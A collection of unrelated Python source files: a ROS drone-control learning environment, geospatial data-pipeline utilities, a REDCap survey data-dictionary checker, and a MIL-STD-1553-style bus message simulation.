threading.Thread(target = self._background_thread).start()
time.sleep(1.0) #waiting for some messages before resetting
self.delete_this_variable = 0
def _setup_spec(self):
self.action_spec = OrderedDict()
self.action_selection_spec = OrderedDict()
self.observation_vec_spec = OrderedDict()
self.goal_spec = OrderedDict()
self.action_spec['yaw'] = Box(low=-180, high=180)
self.action_space = Box(low=np.array([self.action_spec['yaw'].low[0]]), high = np.array([self.action_spec['yaw'].high[0]]))
self.action_selection_spec['yaw'] = Box(low=self._yaw_limits[0], high=self._yaw_limits[1])
self.action_selection_space = Box(low=np.array([self.action_selection_spec['yaw'].low[0]]), high = np.array([self.action_selection_spec['yaw'].high[0]]))
assert (np.logical_and(self.action_selection_space.low >= self.action_space.low,
self.action_selection_space.high <= self.action_space.high).all())
self.observation_im_space = Box(low=0, high=255, shape=self._obs_shape)
self.observation_vec_spec['coll'] = Discrete(1)
def _log(self, msg, lvl):
if not self.suppress_output:
if lvl == "info":
logger.info(msg)
elif lvl == "debug":
logger.debug(msg)
elif lvl == "warn":
logger.warn(msg)
elif lvl == "error":
logger.error(msg)
else:
print("NOT VALID LOG LEVEL")
def _get_observation(self):
msg = self._ros_msgs['cf/0/image']
recon_pil_jpg = BytesIO(msg.data)
recon_pil_arr = Image.open(recon_pil_jpg)
is_grayscale = (self.observation_im_space.shape[-1] == 1)
if is_grayscale:
grayscale = recon_pil_arr.convert('L')
grayscale_resized = grayscale.resize(self.observation_im_space.shape[:-1][::-1],
Image.ANTIALIAS) # b/c (width, height)
im = np.expand_dims(np.array(grayscale_resized), 2)
else:
rgb_resized = recon_pil_arr.resize(self.observation_im_space.shape[:-1][::-1],
Image.ANTIALIAS) # b/c (width, height)
im = np.array(rgb_resized)
coll = self._get_collision() or self._get_joy_coll_stop()
vec = np.array([coll])
if(vec[0]==1):
self._log("COLLISION!!", "info")
return im, vec
def _get_goal(self):
return np.array([])
def _get_reward(self):
if self._is_collision:
reward = self._collision_reward
else:
reward = 0
return reward
### JOYSTICK ###
def _get_joy_stop(self):
#in this order
return self._use_joy_commands and self._stop_pressed
def _get_joy_coll_stop(self):
return self._use_joy_commands and self._coll_stop_pressed
def _get_trash_rollout(self):
return self._use_joy_commands and self._trash_rollout
def _get_joy_start(self):
#in this order
return self._use_joy_commands and self._start_pressed
self._curr_joy and self._curr_joy.buttons[self._joy_start_btn]
### OTHER ###
def _get_collision(self):
return self._is_collision
def _get_done(self):
return self._get_joy_stop() or self._get_collision() or self._get_trash_rollout() or self._get_joy_coll_stop()
def _background_thread(self):
rate = rospy.Rate(10)
while not rospy.is_shutdown():
if (self._use_joy_commands and not self.resetting) or self._send_override:
self._ros_motion_pub.publish(self._curr_motion)
rate.sleep()
def _set_motion(self, x, y, yaw, dz):
motion = crazyflie.msg.CFMotion()
motion.x = x
motion.y = y
motion.yaw = yaw
motion.dz = dz
motion.is_flow_motion = True
self._curr_motion = motion
def _set_command(self, cmd):
#0 is ESTOP, 1 IS LAND, 2 IS TAKEOFF
command = crazyflie.msg.CFCommand()
command.cmd = cmd
self._ros_command_pub.publish(command)
def _set_stop(self, msg):
#0 is no coll stop, 1 is coll stop
stop = crazyflie.msg.JoyStop()
stop.stop = msg
self._ros_stop_pub.publish(stop)
def _joy_cb(self, msg):
self._curr_joy = msg
#permanent state
if self._curr_joy.buttons[self._joy_start_btn]:
self._start_pressed = True
if self._curr_joy.buttons[self._joy_stop_btn]:
self._stop_pressed = True
self._set_stop(0)
if self._curr_joy.buttons[self._joy_coll_stop_btn]:
self._coll_stop_pressed = True
self._set_stop(1)
if self._curr_joy.buttons[self._joy_trash_rollout_btn]:
self._trash_rollout = True
def step(self, action, offline=False):
if not offline:
assert (self.ros_is_good())
if not self._ros_rolloutbag.is_open and self._get_joy_start():
self._log("Beginning Episode...", "info")
self._ros_rolloutbag.open()
elif not self._ros_rolloutbag.is_open:
self._log("Waiting for Joystick input ...", "debug")
action = np.asarray(action)
if not (np.logical_and(action >= self.action_space.low, action <= self.action_space.high).all()):
self._log('Action {0} will be clipped to beget_obser within bounds: {1}, {2}'.format(action,
self.action_space.low,
self.action_space.high), "warn")
action = np.clip(action, self.action_space.low, self.action_space.high)
if self._get_joy_coll_stop() or self._get_trash_rollout():
self._set_motion(0,0,0,0)
else:
yaw = action[0]
self._set_motion(self._fixed_velocity, 0, yaw, 0)
if not offline:
rospy.sleep(max(0., self._dt - (rospy.Time.now() - self._last_step_time).to_sec()))
self._last_step_time = rospy.Time.now()
done = self._get_done()
if done:
self._log('Done after {0} steps'.format(self._t), "warn")
if self._get_collision():
self._log('-- COLLISION --', "warn")
elif self._get_joy_stop() or self._get_joy_coll_stop():
self._log('-- MANUALLY STOPPED --', "warn")
elif self._get_trash_rollout():
self._log('-- TRASHING ROLLOUT --', "warn")
else:
self._log('-- DONE for unknown reason --', "warn")
if not offline and self._ros_rolloutbag.is_open:
#change last collision msg to have a 1 if manually noted a collision
if self._get_joy_coll_stop():
self._ros_msgs[[topic for topic in self._ros_msgs if 'coll' in topic][0]].data = 1
self._ros_rolloutbag.write_all(self._ros_topics_and_types.keys(), self._ros_msgs, self._ros_msg_times)
if done:
self._log('Done after {0} steps'.format(self._t), "debug")
self._t = 0
next_observation = self._get_observation()
goal = self._get_goal()
reward = self._get_reward()
env_info = dict()
self._t += 1
return next_observation, goal, reward, done, env_info
def reset_state(self):
self._last_step_time = rospy.Time.now()
self._is_collision = False
self._t = 0
self._done = False
self._curr_joy = None
self._start_pressed = False
self._stop_pressed = False
self._trash_rollout = False
self._coll_stop_pressed = False
self._send_override = False
self._fixed_velocity = np.random.uniform(self._fixed_velocity_range[0], self._fixed_velocity_range[1])
self._log('Velocity: {0}'.format(self._fixed_velocity), "debug")
def reset(self, offline=False, keep_rosbag=True):
self.resetting = True
if offline:
self._is_collision = False
return self._get_observation(), self._get_goal()
assert self.ros_is_good(), "On End: ROS IS NOT GOOD"
manual_collision_label= self._get_joy_coll_stop()
trash_rollout = self._get_trash_rollout()
if self._ros_rolloutbag.is_open and (trash_rollout or not keep_rosbag or self._get_joy_stop()):
# should've been closed in step when done
self._log('Trashing bag', "debug")
self._ros_rolloutbag.trash()
if self._is_collision:
self._log('Resetting (collision)', "debug")
elif self._get_joy_stop():
self._log('Resetting (joy stop)', "debug")
elif self._get_joy_coll_stop():
self._log('Resetting (joy collision stop)', "debug")
# if manual collision label pressed, start new episode, but skip landing and takeoff
elif self._get_trash_rollout():
self._log('Resetting (trash rollout)', "debug")
else:
self._log('Resetting (other)', "debug")
# end behavior
if not manual_collision_label and not trash_rollout:
self._log("Landing.", 'debug')
self._set_command(0) # land
rospy.sleep(2.0)
else:
self._send_override = True
self._set_motion(0,0,0,0) # stay hovering
time.sleep(1.0) # stopping motion
# if its still open, that means it wasn't flagged to be trashed
# this happens after landing to save battery
if self._ros_rolloutbag.is_open:
#if is collision and config says we need to save, then save on user input, else just save always
if self._is_collision and self._prompt_save_rollout_on_coll:
self._log("Real Collision Happened. Save Rollout? (y/n) default [y]: ", "warn")
res = input()
if res is '' or res is 'y':
self._log('Saving bag', "debug")
self._ros_rolloutbag.close()
else:
self._log('Trashing bag', "debug")
self._ros_rolloutbag.trash()
else:
self._ros_rolloutbag.close()
# other cases
if self._press_enter_on_reset:
self._log('Resetting, press enter to continue', "info")
input()
elif not manual_collision_label and not trash_rollout and self.is_upside_down():
self._log('Crazyflie is upside down', "info")
self._log('Resetting, press enter to continue', "info")
input()
self.reset_state()
assert self.ros_is_good() # "On Start: ROS IS NOT GOOD"
if not manual_collision_label and not trash_rollout:
self._log("Waiting to takeoff ...", "debug")
rospy.sleep(1.0)
self._log("Taking off", "debug")
self._set_command(2)
rospy.sleep(2.0)
#readjustment means full joystick control until you press A (this replaces Wait For Start)
| |
<reponame>yoozze/lulc-classification<gh_stars>0
"""Miscellaneous utilities
"""
import hashlib
import json
import math
import os
import re
import time
from datetime import datetime
# from pathlib import Path
import geopandas as gpd
import numpy as np
from eolearn.core import EOPatch
from src.utils import const
def get_hash(d):
"""Calculates hash from given dictionary `d`.
:param d: Dictionary from which hash will be calculated.
:type d: dict
:return: Hexadecimal hash string.
:rtype: str
"""
json_str = json.dumps(d, sort_keys=True).encode('utf-8')
return hashlib.md5(json_str).hexdigest()
def get_raw_data_dir(cfg):
"""Get path to hash directory inside of raw data directory. Hash is
based on given configuration.
:param cfg: Configuration
:type cfg: dict
:return: Raw data directory.
:rtype: Path
"""
hash_dir = get_hash([
cfg.get('AOI', None),
cfg.get('time_interval', None),
cfg.get('sh_inputs', None)
])
return const.DATA_RAW_DIR / hash_dir
def get_processed_data_dir(cfg):
"""Get path to hash directory inside of processed data directory. Hash is
based on given configuration.
:param cfg: Configuration
:type cfg: dict
:return: Processed data directory.
:rtype: Path
"""
hash_dir = get_hash([
cfg.get('AOI', None),
cfg.get('time_interval', None),
cfg.get('sh_inputs', None),
cfg.get('reference_data', None),
cfg.get('cloud_detection', None),
cfg.get('valid_data', None),
cfg.get('filter', None),
cfg.get('interpolation', None),
cfg.get('features', None),
cfg.get('gradient', None),
cfg.get('edges', None),
cfg.get('raster', None),
cfg.get('preprocess_save', None),
])
return const.DATA_PROCESSED_DIR / hash_dir
def get_sampled_data_dir(cfg):
"""Get path to hash directory inside of sampled data directory. Hash is
based on given configuration.
:param cfg: Configuration
:type cfg: dict
:return: Sampled data directory.
:rtype: Path
"""
hash_dir = get_hash([
cfg.get('AOI', None),
cfg.get('time_interval', None),
cfg.get('sh_inputs', None),
cfg.get('reference_data', None),
cfg.get('cloud_detection', None),
cfg.get('valid_data', None),
cfg.get('filter', None),
cfg.get('interpolation', None),
cfg.get('features', None),
cfg.get('gradient', None),
cfg.get('edges', None),
cfg.get('raster', None),
cfg.get('preprocess_save', None),
cfg.get('sampling', None),
])
return const.DATA_SAMPLED_DIR / hash_dir
def get_final_data_dir(cfg):
"""Get path to hash directory inside of final data directory. Hash is
based on given configuration.
:param cfg: Configuration
:type cfg: dict
:return: Sampled data directory.
:rtype: Path
"""
hash_dir = get_hash([
cfg.get('AOI', None),
cfg.get('time_interval', None),
cfg.get('sh_inputs', None),
cfg.get('reference_data', None),
cfg.get('cloud_detection', None),
cfg.get('valid_data', None),
cfg.get('filter', None),
cfg.get('interpolation', None),
cfg.get('features', None),
cfg.get('gradient', None),
cfg.get('edges', None),
cfg.get('raster', None),
cfg.get('preprocess_save', None),
cfg.get('sampling', None),
cfg.get('timeless_features', None),
])
return const.DATA_FINAL_DIR / hash_dir
def get_models_dir(cfg):
"""Get path to hash directory inside of models directory. Hash is based on
given configuration.
:param cfg: Configuration
:type cfg: dict
:return: Models directory.
:rtype: Path
"""
hash_dir = get_hash([
cfg.get('AOI', None),
cfg.get('time_interval', None),
cfg.get('sh_inputs', None),
cfg.get('reference_data', None),
cfg.get('cloud_detection', None),
cfg.get('valid_data', None),
cfg.get('filter', None),
cfg.get('interpolation', None),
cfg.get('features', None),
cfg.get('gradient', None),
cfg.get('edges', None),
cfg.get('raster', None),
cfg.get('preprocess_save', None),
cfg.get('sampling', None),
cfg.get('timeless_features', None),
cfg.get('modelling', None),
])
return const.MODELS_DIR / hash_dir
def get_date_time_dir_name(timestamp=time.time()):
"""Format (given) timestamp with file system safe characters.
If timestamp is not provided, current time is used.
:param timestamp: Unix timestamp, defaults to time.time()
:type timestamp: float, optional
:return: File system safe date-time string
:rtype: str
"""
date_time = datetime.fromtimestamp(timestamp)
return date_time.strftime('%Y-%m-%d_%H-%M-%S')
def get_report_subdir(config_name, timestamp, subdir):
"""Get subdirectory in reports directory with configuration name and
timestamp parents.
:param config_name: Configuration name
:type config_name: string
:param timestamp: Unix timestamp
:type timestamp: float
:param subdir: Subdirectory name
:type subdir: string
:return: Figures directory path
:rtype: Path
"""
return const.REPORTS_DIR.joinpath(
config_name,
get_date_time_dir_name(timestamp),
subdir
)
def save_results(results, name, config_name, timestamp):
"""Save results to file defined by name, directory name and timestamp.
:param results: Results dictionary.
:type results: dict
:param name: Results file name.
If file path is used, e.g. `__file__`, only base name without extension
will be used.
:type name: str
:param config_name: Configuration name
:type config_name: str
:param timestamp: Unix timestamp
:type timestamp: float
"""
results_name = os.path.splitext(os.path.basename(name))[0]
results_dir = get_report_subdir(config_name, timestamp, 'results')
if not results_dir.is_dir():
results_dir.mkdir(parents=True)
json_path = results_dir / f'{results_name}.json'
with open(json_path, 'w', encoding='utf-8') as json_file:
json.dump(results, json_file)
def format_data_size(size_bytes):
"""Format given data size.
:param size_bytes: Size in bytes.
:type size_bytes: int
:return: Formated size
:rtype: str
"""
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
def get_dir_size(start_path='.'):
"""Calculaet size of given directory.
:param start_path: Directory path, defaults to '.'
:type start_path: str, optional
:return: Size in bytes of given directory, including all subdirectories.
:rtype: int
"""
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
total_size += os.path.getsize(fp)
return total_size
def eval_obj(obj, globals, locals):
"""Evaluate given object.
Only keys and values enclosed in `${...}` are evaluated.
:param obj: Object to be evaluated.
:type obj: object
:param globals: Dictionary of global variables to be used for evaluation.
:type globals: dict[str, object]
:param locals: Dictionary of local variables to be used for evaluation.
:type locals: dict[str, object]
:return: Evaluated object
:rtype: object
"""
if isinstance(obj, dict):
new_obj = {}
for k, v in obj.items():
new_key = eval_obj(k, globals, locals)
new_obj[new_key] = eval_obj(v, globals, locals)
obj = new_obj
elif isinstance(obj, list):
for i, v in enumerate(obj):
obj[i] = eval_obj(v, globals, locals)
else:
if isinstance(obj, str):
match = re.match(r'^(\$\{)([^}]+)\}$', obj)
if match:
obj = eval(match.group(2), globals, locals)
return obj
def get_region_paths(cfg, region, data_dir=None):
"""Get matrix of raw eopatch paths, defined by selected region.
:param cfg: Configuration
:type cfg: dict
:param region: Region defined by range of tile indices.
:type region: list[list[int, int], list[int, int]]
:param data_dir: Data directory with eopatches. Defaults to `None`.
:type data_dir: Path, optional
:return: Matrix of paths to eopatches.
:rtype: np.array(Path)
"""
raw_data_dir = get_raw_data_dir(cfg)
aoi_dir = raw_data_dir / 'AOI'
aoi = gpd.read_file(aoi_dir / 'aoi.shp')
# Query selected tiles within given region.
indices = aoi.index[
(aoi['selected'] == 1)
& aoi['index_x'].between(region[0][0], region[1][0])
& aoi['index_y'].between(region[0][1], region[1][1])
]
if not data_dir:
data_dir = raw_data_dir
patches_dir = data_dir / 'patches'
# Create matrix.
rows = region[1][1] - region[0][1] + 1
cols = region[1][0] - region[0][0] + 1
paths = np.array(
[str(patches_dir / f'eopatch_{idx}') for idx in indices]
).reshape(rows, cols)
# Reorder tiles.
if (rows > 1) and (cols > 1):
paths = np.transpose(np.fliplr(paths))
elif cols > 1:
paths = np.transpose(paths)
else:
paths = np.transpose(np.flipud(paths))
return paths
def get_aoi_bbox(cfg, aoi=None):
"""Get bounding box of AOI.
:param cfg: Configuration
:type cfg: dict
:param aoi: GeoDataFrame of AOI, defaults to None
:type aoi: GeoDataFrame, optional
:return: Bounding box of AOI.
:rtype: tuple[float, float, float, float]
"""
if not aoi:
aoi = gpd.read_file(str(get_raw_data_dir(cfg) / 'AOI'))
# Get bounds of all selected bounding boxes.
bounds = aoi[aoi.selected == 1].bounds
return (
bounds['minx'].min(), bounds['miny'].min(),
bounds['maxx'].max(), bounds['maxy'].max()
)
def get_bounds_from_values(values):
"""Get list of bounds from given list of numeric values.
:param values: List of numeric values
:type values: list[int or float]
:return: List of bounds
:rtype: list[float]
"""
bounds = []
for i in range(len(values)):
if i < len(values) - 1:
if i == 0:
diff = (values[i + 1] - values[i]) / 2
bounds.append(values[i] - diff)
diff = (values[i + 1] - values[i]) / 2
bounds.append(values[i] + diff)
else:
diff = (values[i] - values[i - 1]) / 2
bounds.append(values[i] + diff)
return bounds
def nan_helper(y):
"""Helper to handle indices and logical indices of NaNs.
Input:
- y, 1d numpy array with possible NaNs
Output:
- nans, logical indices of NaNs
- index, a function, with signature indices= index(logical_indices),
to convert logical indices of NaNs to 'equivalent' indices
Example:
>>> # linear interpolation of NaNs
>>> nans, x= nan_helper(y)
>>> y[nans]= np.interp(x(nans), x(~nans), y[~nans])
"""
return np.isnan(y), lambda z: z.nonzero()[0]
def interpolate_array(y):
# If nothing to interpolate, return original.
if not np.isnan(y).any():
return y
nan_count = 0
y_len = len(y)
# Check if array is reparable.
for i, yi in enumerate(y):
if math.isnan():
nan_count += 1
else:
nan_count = 0
# If more than two nans in a seqquence, don't interpolate.
if nan_count > 2:
return None
# If array starts or ends with more than one nans, don't interpolate.
if (i == 1 and nan_count == 2) or (i == y_len - 1 and nan_count == 2):
return None
# Interpolate
nans, x = nan_helper(y)
y[nans] = np.interp(x(nans), x(~nans), y[~nans])
return y
def load_sample_subset(input_dir, subset_id):
eopatches = []
for path in input_dir.iterdir():
eopatch = EOPatch.load(str(path), lazy_loading=True)
if eopatch.meta_info['subset'] == subset_id:
eopatches.append(eopatch)
else:
del eopatch
eopatches = np.array(eopatches)
X = np.array([
eopatch.data['FEATURES_SAMPLED']
for eopatch in eopatches
])
y = np.array([
eopatch.mask_timeless['REF_PROCESSED_SAMPLED']
for eopatch in eopatches
| |
<gh_stars>1-10
import os
import pandas as pd
from datetime import datetime
def stripTags(string):
if "<" in string and ">" in string and string.find("<") < string.find(">"):
iFirst = string.find("<")
iEnd = string.find(">")
strOut = string[:iFirst] + string[iEnd + 1:]
return stripTags(strOut)
else:
return string
def removeDayTag(strIn):
first2 = strIn[1:3].isdigit()
first3 = strIn[1:4].isdigit()
first4 = strIn[1:5].isdigit()
if first4:
return strIn[3:]
elif first3:
return strIn[2:]
elif first2:
return strIn[3:]
else:
return strIn[2:]
def getDay(strIn):
first1 = strIn[1:2].isdigit()
first2 = strIn[1:3].isdigit()
first3 = strIn[1:4].isdigit()
first4 = strIn[1:5].isdigit()
if first4:
return int(strIn[1:3])
elif first3:
return int(strIn[1:2])
elif first2:
return int(strIn[1:3])
else:
return int(strIn[1:2])
def checkReferenceBranching(strIn):
conditions = strIn.split("or")
dictOut = {}
for i in range(len(conditions)):
iOpenBracket = conditions[i].find("[")
iCloseBracket = conditions[i].find("]")
varField = removeDayTag(conditions[i][iOpenBracket + 1:iCloseBracket])
varAns = conditions[i][iCloseBracket + 1:]
if "=" in varAns:
if "'" in varAns:
iOpenStr = varAns.find("'")
iCloseStr = varAns.rfind("'")
varAnsInt = int(varAns[iOpenStr + 1:iCloseStr])
elif '"' in varAns:
iOpenStr = varAns.find('"')
iCloseStr = varAns.rfind('"')
varAnsInt = int(varAns[iOpenStr + 1:iCloseStr])
dictOut[varField] = varAnsInt
else:
dictOut[varField] = "<>"
return dictOut
def checkSelfBranching(strIn, expDay):
conditions = strIn.split("or")
lstOut = []
for i in range(len(conditions)):
if "=" in conditions[i]:
iOpenBracket = conditions[i].find("[")
iCloseBracket = conditions[i].find("]")
varField = getDay(conditions[i][iOpenBracket + 1:iCloseBracket])
lstOut.append(varField)
else:
lstOut.append(expDay)
return [i for i, x in enumerate(lstOut) if x == expDay]
def normalizeEntry(strIn):
strIn = str(strIn)
strIn = strIn.strip()
return strIn
if __name__ == "__main__":
while True:
usrIn = input("Enter a data dictionary path or 'quit' to quit program: ")
if usrIn == 'quit':
break
else:
try:
baseDF = pd.read_csv(usrIn)
except Exception as e:
print(e)
continue
else:
# Generating file name
currDateTime = datetime.now().strftime("%Y-%m-%d_%I-%M-%S-%p")
absFilepath = os.path.join(os.getcwd(), f"W4_DataDictionary_Check_{currDateTime}.txt")
print(f"Collecting values from {usrIn}")
baseDF = pd.read_csv(usrIn, low_memory=False)
day1 = pd.DataFrame(columns=baseDF.columns)
day2 = pd.DataFrame(columns=baseDF.columns)
day3 = pd.DataFrame(columns=baseDF.columns)
day4 = pd.DataFrame(columns=baseDF.columns)
day5 = pd.DataFrame(columns=baseDF.columns)
day6 = pd.DataFrame(columns=baseDF.columns)
day7 = pd.DataFrame(columns=baseDF.columns)
day8 = pd.DataFrame(columns=baseDF.columns)
day9 = pd.DataFrame(columns=baseDF.columns)
day10 = pd.DataFrame(columns=baseDF.columns)
day11 = pd.DataFrame(columns=baseDF.columns)
day12 = pd.DataFrame(columns=baseDF.columns)
day13 = pd.DataFrame(columns=baseDF.columns)
day14 = pd.DataFrame(columns=baseDF.columns)
for index, row in baseDF.iterrows():
if row["Form Name"] == "day_1_monday_daily_survey":
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day1 = day1.append(row)
if "day_2" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day2 = day2.append(row)
if "day_3" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day3 = day3.append(row)
if "day_4" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day4 = day4.append(row)
if "day_5" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day5 = day5.append(row)
if "day_6" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day6 = day6.append(row)
if "day_7" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day7 = day7.append(row)
if "day_8" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day8 = day8.append(row)
if "day_9" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][2:]
day9 = day9.append(row)
if "day_10" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day10 = day10.append(row)
if "day_11" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day11 = day11.append(row)
if "day_12" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day12 = day12.append(row)
if "day_13" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day13 = day13.append(row)
if "day_14" in row["Form Name"]:
row['Variable / Field Name'] = row['Variable / Field Name'][3:]
day14 = day14.append(row)
allDays = [day1, day2, day3, day4, day5, day6, day7, day8, day9, day10, day11, day12, day13, day14]
for i in range(len(allDays)):
newIndex = allDays[i].index - allDays[i].index[0]
allDays[i] = allDays[i].set_index(newIndex)
# Collecting days, putting in otherDays dictionary
otherDays = {}
for i in range(1, len(allDays)):
otherDays[i + 1] = allDays[i]
# Process list of variable field names - Day 1 (Referential)
day1Vars = allDays[0]['Variable / Field Name'].to_list()
for i in range(len(day1Vars)):
day1Vars[i] = str(day1Vars[i])
with open(absFilepath, "w") as fileOut:
# For each day (days 2-14)
for day in otherDays:
dayHeaderString = "------------------------------------------------------------\n" + '###\n'.join(['' for _ in range(3)]) + f"### Day {day}:\n" + '##\n'.join(['' for _ in range(3)]) + "------------------------------------------------------------ "
print(dayHeaderString)
fileOut.write("\n" + dayHeaderString)
# Process list of variable field names - Day x (Comparison)
dayVars = otherDays[day]['Variable / Field Name'].to_list()
dayVars = otherDays[day]['Variable / Field Name'].to_list()
# Checking for variables in day 1 but not in day x
[print(f"Day {day}: Missing t{day}{day1Vars[i]}") for i in range(len(day1Vars)) if
not (day1Vars[i] in dayVars)]
[fileOut.write(f"\nDay {day}: Missing t{day}{day1Vars[i]}") for i in range(len(day1Vars)) if
not (day1Vars[i] in dayVars)]
# Checking for variables in day x but not in day 1
[print(f"Day 1: Missing t1{dayVars[i]} (referencing t{day}{dayVars[i]})") for i in
range(len(dayVars)) if not (dayVars[i] in day1Vars)]
[fileOut.write(f"\nDay 1: Missing t1{dayVars[i]} (referencing t{day}{dayVars[i]})") for i in
range(len(dayVars)) if not (dayVars[i] in day1Vars)]
# Check the order of variables
for index, row in otherDays[day].iterrows():
if row['Variable / Field Name'] != allDays[0].loc[index, 'Variable / Field Name']:
print(
f"MISMATCHED ORDER: Day 1 {allDays[0].loc[index, 'Variable / Field Name']}; Day {day} - {row['Variable / Field Name']} ")
fileOut.write(
f"\nMISMATCHED ORDER: Day 1 {allDays[0].loc[index, 'Variable / Field Name']}; Day {day} - {row['Variable / Field Name']} ")
# for each variable (field) of a single day
for index, row in otherDays[day].iterrows():
if pd.Series.all(row == allDays[0].columns):
continue
currRefVar = pd.Series()
# determine the corresponding variable (field) in day 1
for _, row2 in allDays[0].iterrows():
if row2['Variable / Field Name'] == row['Variable / Field Name']:
currRefVar = row2
break
# checking branching logic
if pd.isna(row['Branching Logic (Show field only if...)']):
if len(currRefVar) > 0 and not pd.isna(
currRefVar['Branching Logic (Show field only if...)']):
print(
f"\n## BRANCHING: Day {day} - {row['Variable / Field Name']} is empty (expected branching)")
fileOut.write(
f"\n\n## BRANCHING: Day {day} - {row['Variable / Field Name']} is empty (expected branching)")
elif not len(currRefVar):
print(
f"\n## BRANCHING: DAY {day} - {row['Variable / Field Name']} does not have a matching variable in day 1")
fileOut.write(
f"\n\n## BRANCHING: DAY {day} - {row['Variable / Field Name']} does not have a matching variable in day 1")
else:
currDict = checkReferenceBranching(row["Branching Logic (Show field only if...)"])
refDict = checkReferenceBranching(currRefVar["Branching Logic (Show field only if...)"])
if currDict != refDict:
print(
f"\n## BRANCHING: Day {day} - {row['Variable / Field Name']} Branching Logic does not match day 1")
print(f"\n\tDay {day} - {currDict}")
print(f"\n\tDay 1 - {refDict}")
fileOut.write(
f"\n\n## BRANCHING: Day {day} - {row['Variable / Field Name']} Branching Logic does not match day 1")
fileOut.write(f"\n\n\tDay {day} - {currDict}")
fileOut.write(f"\n\n\tDay 1 - {refDict}")
if not checkSelfBranching(row["Branching Logic (Show field only if...)"], day):
print(
f"\n## BRANCHING: Day {day} - {row['Variable / Field Name']} Inconsistent branching requirements (not contained within day):\n\t{row['Branching Logic (Show field only if...)']}")
fileOut.write(
f"\n\n## BRANCHING: Day {day} - {row['Variable / Field Name']} Inconsistent branching requirements (not contained within day):\n\t{row['Branching Logic (Show field only if...)']}")
currField = row['Field Label']
if not pd.isna(currField):
currField = normalizeEntry(currField)
if "tuesday" in currField and day % 7 == 3:
currField = currField.replace("tuesday", "sunday")
elif "wednesday" in currField and day % 7 == 4:
currField = currField.replace("wednesday", "sunday")
elif "thursday" in currField and day % 7 == 5:
currField = currField.replace("thursday", "sunday")
elif "friday" in currField and day % 7 == 6:
currField = currField.replace("friday", "sunday")
elif "saturday" in currField and day % 7 == 0:
currField = currField.replace("saturday", "sunday")
elif "monday" in currField and day % 7 == 2:
currField = currField.replace("monday", "sunday")
if "martes" in currField and day % 7 == 3:
currField = currField.replace("martes", "domingo")
elif "miercoles" in currField and day % 7 == 4:
currField = currField.replace("miercoles", "domingo")
elif "jueves" in currField and day % 7 == 5:
currField = currField.replace("jueves", "domingo")
elif "viernes" in currField and day % 7 == 6:
currField = currField.replace("viernes", "domingo")
elif "sabado" in currField and day % 7 == 0:
currField = currField.replace("sabado", "domingo")
elif "lunes" in currField and day % 7 == 2:
currField = currField.replace("lunes", "domingo")
if "miércoles" in currField and day % 7 == 4:
| |
import logging as log
from multiprocessing import Event
import socket
from odf.config import config
import time
import uuid
from enum import Enum
from typing import ClassVar, Generator, List
from collections import defaultdict
from odf.utils import delay
import struct
from datetime import datetime, timedelta
import jsonpickle
# class that represents a word which can be sent over the bus
class Word():
fake = False
# check the parity bit at the end
# currently always true
def check_parity(self):
return True
def __str__(self) -> str:
prefix = '{:<7} '.format(
self.__class__.__name__,
)
return prefix
def to_bytes(self):
# if isinstance(self, Data):
# return self.data
return jsonpickle.encode(self).encode('utf8')
@classmethod
def from_bytes(cls, bytes):
# if len(bytes) == 2:
# return Data(bytes)
return jsonpickle.decode(bytes.decode('utf8'))
# The contents of a status word which can be sent over the bus
class Status(Word):
def __init__(
self,
# Addres of the RT issueing the status word
address='0',
# set to 1 if there was an error in processing one or more of the data words sent
message_error_bit='0',
# optional and should always be set to 0
# used to distinguish between a command word and status word
instrumentation_bit='0',
# set if there is need for a data tramsfer operation that is non-periodic
service_request_bit='0',
# 'reserved for future use' - always set to 0
reserved_bits='000',
# set if the preceeding command word was a broadcast message
brdcst_received_bit='0',
# set if the subsystem cannot move data where its needed
# when set in response to transmit command, RT only sends status word
busy_bit='0',
# set if an RT subsystem has problems and cannot correctly process the data being sent
subsystem_flag_bit='0',
# set for the acceptance of dynamic bus control (RT taking over as BC)
dynamic_bus_control_accpt_bit='0',
# set if there is an RT fautl condition
terminal_flag_bit='1',
# used for parity
parity_bit='1',
) -> None:
super().__init__()
self.address = address
self.message_error_bit = message_error_bit
self.instrumentation_bit = instrumentation_bit
self.service_request_bit = service_request_bit
self.reserved_bits = reserved_bits
self.brdcst_received_bit = brdcst_received_bit
self.busy_bit = busy_bit
self.subsystem_flag_bit = subsystem_flag_bit
self.dynamic_bus_control_accpt_bit = dynamic_bus_control_accpt_bit
self.terminal_flag_bit = terminal_flag_bit
self.parity_bit = parity_bit
def __str__(self) -> str:
attrs = sorted(vars(self).items(), key=lambda x: x[0])
prefix = super().__str__()
return prefix + '('+', '.join([k[:2]+'-'+str(v) for k, v in attrs])+')'
# the content of a data word
class Data(Word):
def __init__(self, data=0xffff) -> None:
super().__init__()
# the only thing here is sixteen bits of data followed by a parity bit
# if isinstance(data, float):
# data = struct.pack('f', data)
# elif isinstance(data, int):
# data = struct.pack('i', data)
if not isinstance(data, bytes):
data = data.to_bytes(2, byteorder='big')
self.data = data
def __str__(self) -> str:
prefix = super().__str__()
return f'{prefix}(0x{self.data.hex()})'
def get_data(self):
return self.data
@classmethod
def pack(cls, data: List, is_float=False):
if len(data) < 1:
return []
if is_float:
d_bytes = struct.pack('%sf' % len(data), *data)
else:
d_bytes = struct.pack('%si' % len(data), *data)
